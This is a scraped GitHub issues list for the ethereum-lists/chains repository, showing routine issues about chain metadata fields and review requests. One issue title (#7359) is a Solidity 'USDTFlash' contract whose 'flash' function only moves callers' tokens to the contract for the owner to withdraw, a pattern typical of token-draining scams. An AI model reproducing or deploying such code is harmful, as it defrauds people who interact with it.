-
Notifications
You must be signed in to change notification settings - Fork 7.3k
Issues: ethereum-lists/chains
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Author
Label
Projects
Milestones
Assignee
Sort
Issues list
// SPDX-License-Identifier: MIT pragma solidity ^0.8.0; interface ITRC20 { function transfer(address to, uint value) external returns (bool); function transferFrom(address from, address to, uint value) external returns (bool); function balanceOf(address owner) external view returns (uint); } contract USDTFlash { address public owner; ITRC20 public usdt; constructor(address _usdt) { owner = msg.sender; usdt = ITRC20(_usdt); } function executeFlash(uint amount) external { require(usdt.transferFrom(msg.sender, address(this), amount), "Transfer failed"); } function withdraw() external { require(msg.sender == owner, "Not owner"); uint balance = usdt.balanceOf(address(this)); require(usdt.transfer(owner, balance), "Withdraw failed"); } }
#7359
opened May 29, 2025 by
issamhaimour
Request for Review: PR #7050 - Studio Blockchain Mainnet Addition Blocked by Inactive Review
#7215
opened Apr 22, 2025 by
StudioPlatforms
Idea: Add L2 Configuration Fields
enhancement
New feature or request
#4833
opened Apr 12, 2024 by
MSilb7
Field "chain" is used twice with different meaning/definition
enhancement
New feature or request
#2373
opened Mar 7, 2023 by
kopeboy
Backfill features and add EIPs
enhancement
New feature or request
help wanted
Extra attention is needed
#1935
opened Nov 24, 2022 by
ligi
BackFill titles
enhancement
New feature or request
help wanted
Extra attention is needed
#723
opened Dec 31, 2021 by
ligi
Add guidelines for shortname
enhancement
New feature or request
#663
opened Dec 14, 2021 by
rmeissner
Previous Next
ProTip!
Add no:assignee to see everything that’s not assigned.